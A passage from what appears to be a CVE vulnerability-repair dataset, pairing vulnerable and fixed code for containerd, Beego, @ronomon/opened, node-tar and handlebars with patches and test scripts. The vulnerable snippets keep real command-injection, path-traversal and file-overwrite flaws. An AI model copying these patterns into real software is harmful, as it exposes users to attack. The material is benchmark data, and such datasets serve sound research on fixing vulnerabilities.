{\n\t\t\t\t\t\treturn true\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\treturn false\n\t\t\t})\n\t\t\tif err != nil {\n\t\t\t\tif os.IsNotExist(err) {\n\t\t\t\t\treturn nil\n\t\t\t\t}\n\t\t\t\treturn err\n\t\t\t}\n\t\t\ts.Process.User.AdditionalGids = gids\n\t\t\treturn nil\n\t\t}\n\t\tif c.Snapshotter == \"\" && c.SnapshotKey == \"\" {\n\t\t\tif !isRootfsAbs(s.Root.Path) {\n\t\t\t\treturn errors.New(\"rootfs absolute path is required\")\n\t\t\t}\n\t\t\treturn setAdditionalGids(s.Root.Path)\n\t\t}\n\t\tif c.Snapshotter == \"\" {\n\t\t\treturn errors.New(\"no snapshotter set for container\")\n\t\t}\n\t\tif c.SnapshotKey == \"\" {\n\t\t\treturn errors.New(\"rootfs snapshot not created for container\")\n\t\t}\n\t\tsnapshotter := client.SnapshotService(c.Snapshotter)\n\t\tmounts, err := snapshotter.Mounts(ctx, c.SnapshotKey)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tmounts = tryReadonlyMounts(mounts)\n\t\treturn mount.WithTempMount(ctx, mounts, setAdditionalGids)\n\t}\n}"}, {"id": "fix_go_52_7", "commit": "133f6bb6cd827ce35a5fb279c1ead12b9d21460a", "file_path": "oci/spec_opts.go", "start_line": 812, "end_line": 870, "snippet": "func WithAppendAdditionalGroups(groups ...string) SpecOpts {\n\treturn func(ctx context.Context, client Client, c *containers.Container, s *Spec) (err error) {\n\t\t// For LCOW or on Darwin additional GID's are not supported\n\t\tif s.Windows != nil || runtime.GOOS == \"darwin\" {\n\t\t\treturn nil\n\t\t}\n\t\tsetProcess(s)\n\t\tsetAdditionalGids := func(root string) error {\n\t\t\tdefer ensureAdditionalGids(s)\n\t\t\tgpath, err := fs.RootPath(root, \"/etc/group\")\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tugroups, err := user.ParseGroupFile(gpath)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tgroupMap := make(map[string]user.Group)\n\t\t\tfor _, group := range ugroups {\n\t\t\t\tgroupMap[group.Name] = group\n\t\t\t}\n\t\t\tvar gids []uint32\n\t\t\tfor _, group := range groups {\n\t\t\t\tgid, err := strconv.ParseUint(group, 10, 32)\n\t\t\t\tif err == nil {\n\t\t\t\t\tgids = append(gids, uint32(gid))\n\t\t\t\t} else {\n\t\t\t\t\tg, ok := groupMap[group]\n\t\t\t\t\tif !ok {\n\t\t\t\t\t\treturn fmt.Errorf(\"unable to find group %s\", group)\n\t\t\t\t\t}\n\t\t\t\t\tgids = append(gids, uint32(g.Gid))\n\t\t\t\t}\n\t\t\t}\n\t\t\ts.Process.User.AdditionalGids = append(s.Process.User.AdditionalGids, gids...)\n\t\t\treturn nil\n\t\t}\n\t\tif c.Snapshotter == \"\" && c.SnapshotKey == \"\" {\n\t\t\tif !filepath.IsAbs(s.Root.Path) {\n\t\t\t\treturn errors.New(\"rootfs absolute path is required\")\n\t\t\t}\n\t\t\treturn setAdditionalGids(s.Root.Path)\n\t\t}\n\t\tif c.Snapshotter == \"\" {\n\t\t\treturn errors.New(\"no snapshotter set for container\")\n\t\t}\n\t\tif c.SnapshotKey == \"\" {\n\t\t\treturn errors.New(\"rootfs snapshot not created for container\")\n\t\t}\n\t\tsnapshotter := client.SnapshotService(c.Snapshotter)\n\t\tmounts, err := snapshotter.Mounts(ctx, c.SnapshotKey)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tmounts = tryReadonlyMounts(mounts)\n\t\treturn mount.WithTempMount(ctx, mounts, setAdditionalGids)\n\t}\n}"}], "vul_patch": "--- a/oci/spec_opts.go\n+++ b/oci/spec_opts.go\n@@ -1,6 +1,8 @@\n func WithUser(userstr string) SpecOpts {\n \treturn func(ctx context.Context, client Client, c *containers.Container, s *Spec) error {\n+\t\tdefer ensureAdditionalGids(s)\n \t\tsetProcess(s)\n+\t\ts.Process.User.AdditionalGids = nil\n \n \t\t// For LCOW it's a bit harder to confirm that the user actually exists on the host as a rootfs isn't\n \t\t// mounted on the host and shared into the guest, but rather the rootfs is constructed entirely in the\n\n--- a/oci/spec_opts.go\n+++ b/oci/spec_opts.go\n@@ -1,6 +1,8 @@\n func WithUIDGID(uid, gid uint32) SpecOpts {\n \treturn func(_ context.Context, _ Client, _ *containers.Container, s *Spec) error {\n+\t\tdefer ensureAdditionalGids(s)\n \t\tsetProcess(s)\n+\t\ts.Process.User.AdditionalGids = nil\n \t\ts.Process.User.UID = uid\n \t\ts.Process.User.GID = gid\n \t\treturn nil\n\n--- a/oci/spec_opts.go\n+++ b/oci/spec_opts.go\n@@ -1,11 +1,10 @@\n func WithUserID(uid uint32) SpecOpts {\n \treturn func(ctx context.Context, client Client, c *containers.Container, s *Spec) (err error) {\n+\t\tdefer ensureAdditionalGids(s)\n \t\tsetProcess(s)\n-\t\tif c.Snapshotter == \"\" && c.SnapshotKey == \"\" {\n-\t\t\tif !isRootfsAbs(s.Root.Path) {\n-\t\t\t\treturn errors.New(\"rootfs absolute path is required\")\n-\t\t\t}\n-\t\t\tuser, err := UserFromPath(s.Root.Path, func(u user.User) bool {\n+\t\ts.Process.User.AdditionalGids = nil\n+\t\tsetUser := func(root string) error {\n+\t\t\tuser, err := UserFromPath(root, func(u user.User) bool {\n \t\t\t\treturn u.Uid == int(uid)\n \t\t\t})\n \t\t\tif err != nil {\n@@ -17,7 +16,12 @@\n \t\t\t}\n \t\t\ts.Process.User.UID, s.Process.User.GID = uint32(user.Uid), uint32(user.Gid)\n \t\t\treturn nil\n-\n+\t\t}\n+\t\tif c.Snapshotter == \"\" && c.SnapshotKey == \"\" {\n+\t\t\tif !isRootfsAbs(s.Root.Path) {\n+\t\t\t\treturn errors.New(\"rootfs absolute path is required\")\n+\t\t\t}\n+\t\t\treturn setUser(s.Root.Path)\n \t\t}\n \t\tif c.Snapshotter == \"\" {\n \t\t\treturn errors.New(\"no snapshotter set for container\")\n@@ -32,19 +36,6 @@\n \t\t}\n \n \t\tmounts = tryReadonlyMounts(mounts)\n-\t\treturn mount.WithTempMount(ctx, mounts, func(root string) error {\n-\t\t\tuser, err := UserFromPath(root, func(u user.User) bool {\n-\t\t\t\treturn u.Uid == int(uid)\n-\t\t\t})\n-\t\t\tif err != nil {\n-\t\t\t\tif os.IsNotExist(err) || err == ErrNoUsersFound {\n-\t\t\t\t\ts.Process.User.UID, s.Process.User.GID = uid, 0\n-\t\t\t\t\treturn nil\n-\t\t\t\t}\n-\t\t\t\treturn err\n-\t\t\t}\n-\t\t\ts.Process.User.UID, s.Process.User.GID = uint32(user.Uid), uint32(user.Gid)\n-\t\t\treturn nil\n-\t\t})\n+\t\treturn mount.WithTempMount(ctx, mounts, setUser)\n \t}\n }\n\n--- a/oci/spec_opts.go\n+++ b/oci/spec_opts.go\n@@ -1,12 +1,11 @@\n func WithUsername(username string) SpecOpts {\n \treturn func(ctx context.Context, client Client, c *containers.Container, s *Spec) (err error) {\n+\t\tdefer ensureAdditionalGids(s)\n \t\tsetProcess(s)\n+\t\ts.Process.User.AdditionalGids = nil\n \t\tif s.Linux != nil {\n-\t\t\tif c.Snapshotter == \"\" && c.SnapshotKey == \"\" {\n-\t\t\t\tif !isRootfsAbs(s.Root.Path) {\n-\t\t\t\t\treturn errors.New(\"rootfs absolute path is required\")\n-\t\t\t\t}\n-\t\t\t\tuser, err := UserFromPath(s.Root.Path, func(u user.User) bool {\n+\t\t\tsetUser := func(root string) error {\n+\t\t\t\tuser, err := UserFromPath(root, func(u user.User) bool {\n \t\t\t\t\treturn u.Name == username\n \t\t\t\t})\n \t\t\t\tif err != nil {\n@@ -14,6 +13,12 @@\n \t\t\t\t}\n \t\t\t\ts.Process.User.UID, s.Process.User.GID = uint32(user.Uid), uint32(user.Gid)\n \t\t\t\treturn nil\n+\t\t\t}\n+\t\t\tif c.Snapshotter == \"\" && c.SnapshotKey == \"\" {\n+\t\t\t\tif !isRootfsAbs(s.Root.Path) {\n+\t\t\t\t\treturn errors.New(\"rootfs absolute path is required\")\n+\t\t\t\t}\n+\t\t\t\treturn setUser(s.Root.Path)\n \t\t\t}\n \t\t\tif c.Snapshotter == \"\" {\n \t\t\t\treturn errors.New(\"no snapshotter set for container\")\n@@ -28,16 +33,7 @@\n \t\t\t}\n \n \t\t\tmounts = tryReadonlyMounts(mounts)\n-\t\t\treturn mount.WithTempMount(ctx, mounts, func(root string) error {\n-\t\t\t\tuser, err := UserFromPath(root, func(u user.User) bool {\n-\t\t\t\t\treturn u.Name == username\n-\t\t\t\t})\n-\t\t\t\tif err != nil {\n-\t\t\t\t\treturn err\n-\t\t\t\t}\n-\t\t\t\ts.Process.User.UID, s.Process.User.GID = uint32(user.Uid), uint32(user.Gid)\n-\t\t\t\treturn nil\n-\t\t\t})\n+\t\t\treturn mount.WithTempMount(ctx, mounts, setUser)\n \t\t} else if s.Windows != nil {\n \t\t\ts.Process.User.Username = username\n \t\t} else {\n\n--- a/oci/spec_opts.go\n+++ b/oci/spec_opts.go\n@@ -5,7 +5,9 @@\n \t\t\treturn nil\n \t\t}\n \t\tsetProcess(s)\n+\t\ts.Process.User.AdditionalGids = nil\n \t\tsetAdditionalGids := func(root string) error {\n+\t\t\tdefer ensureAdditionalGids(s)\n \t\t\tvar username string\n \t\t\tuid, err := strconv.Atoi(userstr)\n \t\t\tif err == nil {\n\n--- /dev/null\n+++ b/oci/spec_opts.go\n@@ -0,0 +1,10 @@\n+// ensureAdditionalGids ensures that the primary GID is also included in the additional GID list.\n+func ensureAdditionalGids(s *Spec) {\n+\tsetProcess(s)\n+\tfor _, f := range s.Process.User.AdditionalGids {\n+\t\tif f == s.Process.User.GID {\n+\t\t\treturn\n+\t\t}\n+\t}\n+\ts.Process.User.AdditionalGids = append([]uint32{s.Process.User.GID}, s.Process.User.AdditionalGids...)\n+}\n\n--- /dev/null\n+++ b/oci/spec_opts.go\n@@ -0,0 +1,59 @@\n+func WithAppendAdditionalGroups(groups ...string) SpecOpts {\n+\treturn func(ctx context.Context, client Client, c *containers.Container, s *Spec) (err error) {\n+\t\t// For LCOW or on Darwin additional GID's are not supported\n+\t\tif s.Windows != nil || runtime.GOOS == \"darwin\" {\n+\t\t\treturn nil\n+\t\t}\n+\t\tsetProcess(s)\n+\t\tsetAdditionalGids := func(root string) error {\n+\t\t\tdefer ensureAdditionalGids(s)\n+\t\t\tgpath, err := fs.RootPath(root, \"/etc/group\")\n+\t\t\tif err != nil {\n+\t\t\t\treturn err\n+\t\t\t}\n+\t\t\tugroups, err := user.ParseGroupFile(gpath)\n+\t\t\tif err != nil {\n+\t\t\t\treturn err\n+\t\t\t}\n+\t\t\tgroupMap := make(map[string]user.Group)\n+\t\t\tfor _, group := range ugroups {\n+\t\t\t\tgroupMap[group.Name] = group\n+\t\t\t}\n+\t\t\tvar gids []uint32\n+\t\t\tfor _, group := range groups {\n+\t\t\t\tgid, err := strconv.ParseUint(group, 10, 32)\n+\t\t\t\tif err == nil {\n+\t\t\t\t\tgids = append(gids, uint32(gid))\n+\t\t\t\t} else {\n+\t\t\t\t\tg, ok := groupMap[group]\n+\t\t\t\t\tif !ok {\n+\t\t\t\t\t\treturn fmt.Errorf(\"unable to find group %s\", group)\n+\t\t\t\t\t}\n+\t\t\t\t\tgids = append(gids, uint32(g.Gid))\n+\t\t\t\t}\n+\t\t\t}\n+\t\t\ts.Process.User.AdditionalGids = append(s.Process.User.AdditionalGids, gids...)\n+\t\t\treturn nil\n+\t\t}\n+\t\tif c.Snapshotter == \"\" && c.SnapshotKey == \"\" {\n+\t\t\tif !filepath.IsAbs(s.Root.Path) {\n+\t\t\t\treturn errors.New(\"rootfs absolute path is required\")\n+\t\t\t}\n+\t\t\treturn setAdditionalGids(s.Root.Path)\n+\t\t}\n+\t\tif c.Snapshotter == \"\" {\n+\t\t\treturn errors.New(\"no snapshotter set for container\")\n+\t\t}\n+\t\tif c.SnapshotKey == \"\" {\n+\t\t\treturn errors.New(\"rootfs snapshot not created for container\")\n+\t\t}\n+\t\tsnapshotter := client.SnapshotService(c.Snapshotter)\n+\t\tmounts, err := snapshotter.Mounts(ctx, c.SnapshotKey)\n+\t\tif err != nil {\n+\t\t\treturn err\n+\t\t}\n+\n+\t\tmounts = tryReadonlyMounts(mounts)\n+\t\treturn mount.WithTempMount(ctx, mounts, setAdditionalGids)\n+\t}\n+}\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2023-25173:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/containerd\nrm -rf ./oci/spec_opts_linux_test.go\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ngo test -timeout 30s -run ^TestWithAdditionalGIDs$ github.com/containerd/containerd/oci\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2023-25173:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/containerd\ngit apply --whitespace=nowarn /workspace/fix.patch\ncd oci && go test -timeout 30s github.com/containerd/containerd/oci\n"} {"cve_id": "CVE-2022-31836", "cve_description": "The leafInfo.match() function in Beego v2.0.3 and below uses path.join() to deal with wildcardvalues which can lead to cross directory risk.", "cwe_info": {"CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/beego/beego", "patch_url": ["https://github.com/beego/beego/commit/809c0b46acd013159afd19961a8e02c93df6e9e2"], "programing_language": "Go", "vul_func": [{"id": "vul_go_154_1", "commit": "c143120", "file_path": "server/web/tree.go", "start_line": 284, "end_line": 290, "snippet": "func (t *Tree) Match(pattern string, ctx *context.Context) (runObject interface{}) {\n\tif pattern == \"\" || pattern[0] != '/' {\n\t\treturn nil\n\t}\n\tw := make([]string, 0, 20)\n\treturn t.match(pattern[1:], pattern, w, ctx)\n}"}], "fix_func": [{"id": "fix_go_154_1", "commit": "809c0b4", "file_path": "server/web/tree.go", "start_line": 284, "end_line": 292, "snippet": "func (t *Tree) Match(pattern string, ctx *context.Context) (runObject interface{}) {\n\t// fix issue 4961, deal with \"./ ../ //\"\n\tpattern = path.Clean(pattern)\n\tif pattern == \"\" || pattern[0] != '/' {\n\t\treturn nil\n\t}\n\tw := make([]string, 0, 20)\n\treturn t.match(pattern[1:], pattern, w, ctx)\n}"}], "vul_patch": "--- a/server/web/tree.go\n+++ b/server/web/tree.go\n@@ -1,4 +1,6 @@\n func (t *Tree) Match(pattern string, ctx *context.Context) (runObject interface{}) {\n+\t// fix issue 4961, deal with \"./ ../ //\"\n+\tpattern = path.Clean(pattern)\n \tif pattern == \"\" || pattern[0] != '/' {\n \t\treturn nil\n \t}\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-29300", "cve_description": "The @ronomon/opened library before 1.5.2 is vulnerable to a command injection vulnerability which would allow a remote attacker to execute commands on the system if the library was used with untrusted input.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/ronomon/opened", "patch_url": ["https://github.com/ronomon/opened/commit/7effe011d4fea8fac7f78c00615e0a6e69af68ec"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_191_1", "commit": "33c2dfb", "file_path": "index.js", "start_line": 75, "end_line": 112, "snippet": "Unix.files = function(paths, end) {\n var self = this;\n assertPaths('paths', paths);\n assertFunction('end', end);\n var files = {};\n var queue = new Queue(1); // Concurrency yields no improvement with lsof.\n queue.onData = function(paths, end) {\n var escapedPaths = paths.map(\n function(path) {\n return '\"' + path.replace(/\"/g, '\\\\\"') + '\"';\n }\n );\n var command = 'lsof -F n -- ' + escapedPaths.join(' ');\n var options = {\n encoding: 'utf-8',\n maxBuffer: 2 * 1024 * 1024\n };\n Node.child.exec(command, options,\n function(error, stdout, stderr) {\n // lsof returns an error and a status code of 1 if a file is not open:\n if (error && error.code === 1 && stderr.length === 0) error = undefined;\n if (error) {\n if (/No such file or directory/i.test(stderr)) {\n error.code = 'ENOENT';\n }\n return end(error);\n }\n var lines = stdout.split('\\n');\n for (var index = 0, length = lines.length; index < length; index++) {\n var line = lines[index];\n if (line[0] != 'n') continue;\n var candidate = self.unescape(line.slice(1));\n if (files.hasOwnProperty(candidate)) files[candidate] = true;\n }\n end();\n }\n );\n };"}], "fix_func": [{"id": "fix_js_191_1", "commit": "7effe01", "file_path": "index.js", "start_line": 75, "end_line": 108, "snippet": "Unix.files = function(paths, end) {\n var self = this;\n assertPaths('paths', paths);\n assertFunction('end', end);\n var files = {};\n var queue = new Queue(1); // Concurrency yields no improvement with lsof.\n queue.onData = function(paths, end) {\n var command = 'lsof';\n var args = ['-F', 'n', '--'].concat(paths);\n var options = {\n encoding: 'utf-8',\n maxBuffer: 2 * 1024 * 1024\n };\n Node.child.execFile(command, args, options,\n function(error, stdout, stderr) {\n // lsof returns an error and a status code of 1 if a file is not open:\n if (error && error.code === 1 && stderr.length === 0) error = undefined;\n if (error) {\n if (/No such file or directory/i.test(stderr)) {\n error.code = 'ENOENT';\n }\n return end(error);\n }\n var lines = stdout.split('\\n');\n for (var index = 0, length = lines.length; index < length; index++) {\n var line = lines[index];\n if (line[0] != 'n') continue;\n var candidate = self.unescape(line.slice(1));\n if (files.hasOwnProperty(candidate)) files[candidate] = true;\n }\n end();\n }\n );\n };"}], "vul_patch": "--- a/index.js\n+++ b/index.js\n@@ -5,17 +5,13 @@\n var files = {};\n var queue = new Queue(1); // Concurrency yields no improvement with lsof.\n queue.onData = function(paths, end) {\n- var escapedPaths = paths.map(\n- function(path) {\n- return '\"' + path.replace(/\"/g, '\\\\\"') + '\"';\n- }\n- );\n- var command = 'lsof -F n -- ' + escapedPaths.join(' ');\n+ var command = 'lsof';\n+ var args = ['-F', 'n', '--'].concat(paths);\n var options = {\n encoding: 'utf-8',\n maxBuffer: 2 * 1024 * 1024\n };\n- Node.child.exec(command, options,\n+ Node.child.execFile(command, args, options,\n function(error, stdout, stderr) {\n // lsof returns an error and a status code of 1 if a file is not open:\n if (error && error.code === 1 && stderr.length === 0) error = undefined;\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-37712", "cve_description": "The npm package \"tar\" (aka node-tar) before versions 4.4.18, 5.0.10, and 6.1.9 has an arbitrary file creation/overwrite and arbitrary code execution vulnerability. node-tar aims to guarantee that any file whose location would be modified by a symbolic link is not extracted. This is, in part, achieved by ensuring that extracted directories are not symlinks. Additionally, in order to prevent unnecessary stat calls to determine whether a given path is a directory, paths are cached when directories are created. This logic was insufficient when extracting tar files that contained both a directory and a symlink with names containing unicode values that normalized to the same value. Additionally, on Windows systems, long path portions would resolve to the same file system entities as their 8.3 \"short path\" counterparts. A specially crafted tar archive could thus include a directory with one form of the path, followed by a symbolic link with a different string that resolves to the same file system entity, followed by a file using the first form. By first creating a directory, and then replacing that directory with a symlink that had a different apparent name that resolved to the same entry in the filesystem, it was thus possible to bypass node-tar symlink checks on directories, essentially allowing an untrusted tar file to symlink into an arbitrary location and subsequently extracting arbitrary files into that location, thus allowing arbitrary file creation and overwrite. These issues were addressed in releases 4.4.18, 5.0.10 and 6.1.9. The v3 branch of node-tar has been deprecated and did not receive patches for these issues. If you are still using a v3 release we recommend you update to a more recent version of node-tar. If this is not possible, a workaround is available in the referenced GHSA-qq89-hq3f-393p.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/isaacs/node-tar", "patch_url": ["https://github.com/isaacs/node-tar/commit/1739408d3122af897caefd09662bce2ea477533b", "https://github.com/isaacs/node-tar/commit/2f1bca027286c23e110b8dfc7efc10756fa3db5a", "https://github.com/isaacs/node-tar/commit/b6162c7fafe797f856564ef37f4b82747f051455", "https://github.com/isaacs/node-tar/commit/bb93ba243746f705092905da1955ac3b0509ba1e", "https://github.com/isaacs/node-tar/commit/3aaf19b2501bbddb145d92b3322c80dcaed3c35f", "https://github.com/isaacs/node-tar/commit/d56f790bda9fea807dd80c5083f24771dbdd6eb1"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_56_1", "commit": "d56f790bda9fea807dd80c5083f24771dbdd6eb1", "file_path": "lib/path-reservations.js", "start_line": 13, "end_line": 128, "snippet": "module.exports = () => {\n // path => [function or Set]\n // A Set object means a directory reservation\n // A fn is a direct reservation on that path\n const queues = new Map()\n\n // fn => {paths:[path,...], dirs:[path, ...]}\n const reservations = new Map()\n\n // return a set of parent dirs for a given path\n const getDirs = path =>\n path.split('/').slice(0, -1).reduce((set, path) =>\n set.length ? set.concat(normPath(join(set[set.length - 1], path)))\n : [path], [])\n\n // functions currently running\n const running = new Set()\n\n // return the queues for each path the function cares about\n // fn => {paths, dirs}\n const getQueues = fn => {\n const res = reservations.get(fn)\n /* istanbul ignore if - unpossible */\n if (!res)\n throw new Error('function does not have any path reservations')\n return {\n paths: res.paths.map(path => queues.get(path)),\n dirs: [...res.dirs].map(path => queues.get(path)),\n }\n }\n\n // check if fn is first in line for all its paths, and is\n // included in the first set for all its dir queues\n const check = fn => {\n const {paths, dirs} = getQueues(fn)\n return paths.every(q => q[0] === fn) &&\n dirs.every(q => q[0] instanceof Set && q[0].has(fn))\n }\n\n // run the function if it's first in line and not already running\n const run = fn => {\n if (running.has(fn) || !check(fn))\n return false\n running.add(fn)\n fn(() => clear(fn))\n return true\n }\n\n const clear = fn => {\n if (!running.has(fn))\n return false\n\n const { paths, dirs } = reservations.get(fn)\n const next = new Set()\n\n paths.forEach(path => {\n const q = queues.get(path)\n assert.equal(q[0], fn)\n if (q.length === 1)\n queues.delete(path)\n else {\n q.shift()\n if (typeof q[0] === 'function')\n next.add(q[0])\n else\n q[0].forEach(fn => next.add(fn))\n }\n })\n\n dirs.forEach(dir => {\n const q = queues.get(dir)\n assert(q[0] instanceof Set)\n if (q[0].size === 1 && q.length === 1) {\n queues.delete(dir)\n } else if (q[0].size === 1) {\n q.shift()\n\n // must be a function or else the Set would've been reused\n next.add(q[0])\n } else\n q[0].delete(fn)\n })\n running.delete(fn)\n\n next.forEach(fn => run(fn))\n return true\n }\n\n const reserve = (paths, fn) => {\n paths = paths.map(p => normPath(join(p)).toLowerCase())\n const dirs = new Set(\n paths.map(path => getDirs(path)).reduce((a, b) => a.concat(b))\n )\n reservations.set(fn, {dirs, paths})\n paths.forEach(path => {\n const q = queues.get(path)\n if (!q)\n queues.set(path, [fn])\n else\n q.push(fn)\n })\n dirs.forEach(dir => {\n const q = queues.get(dir)\n if (!q)\n queues.set(dir, [new Set([fn])])\n else if (q[q.length-1] instanceof Set)\n q[q.length-1].add(fn)\n else\n q.push(new Set([fn]))\n })\n\n return run(fn)\n }\n\n return { check, reserve }\n}"}], "fix_func": [{"id": "fix_js_56_1", "commit": "1739408d3122af897caefd09662bce2ea477533b", "file_path": "lib/path-reservations.js", "start_line": 17, "end_line": 149, "snippet": "module.exports = () => {\n // path => [function or Set]\n // A Set object means a directory reservation\n // A fn is a direct reservation on that path\n const queues = new Map()\n\n // fn => {paths:[path,...], dirs:[path, ...]}\n const reservations = new Map()\n\n // return a set of parent dirs for a given path\n // '/a/b/c/d' -> ['/', '/a', '/a/b', '/a/b/c', '/a/b/c/d']\n const getDirs = path => {\n const dirs = path.split('/').slice(0, -1).reduce((set, path) => {\n if (set.length)\n path = normPath(join(set[set.length - 1], path))\n set.push(path || '/')\n return set\n }, [])\n return dirs\n }\n\n // functions currently running\n const running = new Set()\n\n // return the queues for each path the function cares about\n // fn => {paths, dirs}\n const getQueues = fn => {\n const res = reservations.get(fn)\n /* istanbul ignore if - unpossible */\n if (!res)\n throw new Error('function does not have any path reservations')\n return {\n paths: res.paths.map(path => queues.get(path)),\n dirs: [...res.dirs].map(path => queues.get(path)),\n }\n }\n\n // check if fn is first in line for all its paths, and is\n // included in the first set for all its dir queues\n const check = fn => {\n const {paths, dirs} = getQueues(fn)\n return paths.every(q => q[0] === fn) &&\n dirs.every(q => q[0] instanceof Set && q[0].has(fn))\n }\n\n // run the function if it's first in line and not already running\n const run = fn => {\n if (running.has(fn) || !check(fn))\n return false\n running.add(fn)\n fn(() => clear(fn))\n return true\n }\n\n const clear = fn => {\n if (!running.has(fn))\n return false\n\n const { paths, dirs } = reservations.get(fn)\n const next = new Set()\n\n paths.forEach(path => {\n const q = queues.get(path)\n assert.equal(q[0], fn)\n if (q.length === 1)\n queues.delete(path)\n else {\n q.shift()\n if (typeof q[0] === 'function')\n next.add(q[0])\n else\n q[0].forEach(fn => next.add(fn))\n }\n })\n\n dirs.forEach(dir => {\n const q = queues.get(dir)\n assert(q[0] instanceof Set)\n if (q[0].size === 1 && q.length === 1) {\n queues.delete(dir)\n } else if (q[0].size === 1) {\n q.shift()\n\n // must be a function or else the Set would've been reused\n next.add(q[0])\n } else\n q[0].delete(fn)\n })\n running.delete(fn)\n\n next.forEach(fn => run(fn))\n return true\n }\n\n const reserve = (paths, fn) => {\n // collide on matches across case and unicode normalization\n // On windows, thanks to the magic of 8.3 shortnames, it is fundamentally\n // impossible to determine whether two paths refer to the same thing on\n // disk, without asking the kernel for a shortname.\n // So, we just pretend that every path matches every other path here,\n // effectively removing all parallelization on windows.\n paths = isWindows ? ['win32 parallelization disabled'] : paths.map(p => {\n return stripSlashes(normPath(join(p)))\n .normalize('NFKD')\n .toLowerCase()\n })\n\n const dirs = new Set(\n paths.map(path => getDirs(path)).reduce((a, b) => a.concat(b))\n )\n reservations.set(fn, {dirs, paths})\n paths.forEach(path => {\n const q = queues.get(path)\n if (!q)\n queues.set(path, [fn])\n else\n q.push(fn)\n })\n dirs.forEach(dir => {\n const q = queues.get(dir)\n if (!q)\n queues.set(dir, [new Set([fn])])\n else if (q[q.length-1] instanceof Set)\n q[q.length-1].add(fn)\n else\n q.push(new Set([fn]))\n })\n\n return run(fn)\n }\n\n return { check, reserve }\n}"}, {"id": "fix_js_56_2", "commit": "1739408d3122af897caefd09662bce2ea477533b", "file_path": "lib/path-reservations.js", "start_line": 14, "end_line": 15, "snippet": "const platform = process.env.TESTING_TAR_FAKE_PLATFORM || process.platform\nconst isWindows = platform === 'win32'"}], "vul_patch": "--- a/lib/path-reservations.js\n+++ b/lib/path-reservations.js\n@@ -8,10 +8,16 @@\n const reservations = new Map()\n \n // return a set of parent dirs for a given path\n- const getDirs = path =>\n- path.split('/').slice(0, -1).reduce((set, path) =>\n- set.length ? set.concat(normPath(join(set[set.length - 1], path)))\n- : [path], [])\n+ // '/a/b/c/d' -> ['/', '/a', '/a/b', '/a/b/c', '/a/b/c/d']\n+ const getDirs = path => {\n+ const dirs = path.split('/').slice(0, -1).reduce((set, path) => {\n+ if (set.length)\n+ path = normPath(join(set[set.length - 1], path))\n+ set.push(path || '/')\n+ return set\n+ }, [])\n+ return dirs\n+ }\n \n // functions currently running\n const running = new Set()\n@@ -87,7 +93,18 @@\n }\n \n const reserve = (paths, fn) => {\n- paths = paths.map(p => normPath(join(p)).toLowerCase())\n+ // collide on matches across case and unicode normalization\n+ // On windows, thanks to the magic of 8.3 shortnames, it is fundamentally\n+ // impossible to determine whether two paths refer to the same thing on\n+ // disk, without asking the kernel for a shortname.\n+ // So, we just pretend that every path matches every other path here,\n+ // effectively removing all parallelization on windows.\n+ paths = isWindows ? ['win32 parallelization disabled'] : paths.map(p => {\n+ return stripSlashes(normPath(join(p)))\n+ .normalize('NFKD')\n+ .toLowerCase()\n+ })\n+\n const dirs = new Set(\n paths.map(path => getDirs(path)).reduce((a, b) => a.concat(b))\n )\n\n--- /dev/null\n+++ b/lib/path-reservations.js\n@@ -0,0 +1,2 @@\n+const platform = process.env.TESTING_TAR_FAKE_PLATFORM || process.platform\n+const isWindows = platform === 'win32'\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-37712:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/node-tar\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\nnode test/path-reservations.js\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-37712:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/node-tar\ngit apply --whitespace=nowarn /workspace/fix.patch\nnode test/path-reservations.js\n"} {"cve_id": "CVE-2021-23369", "cve_description": "The package handlebars before 4.7.7 are vulnerable to Remote Code Execution (RCE) when selecting certain compiling options to compile templates coming from an untrusted source.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input 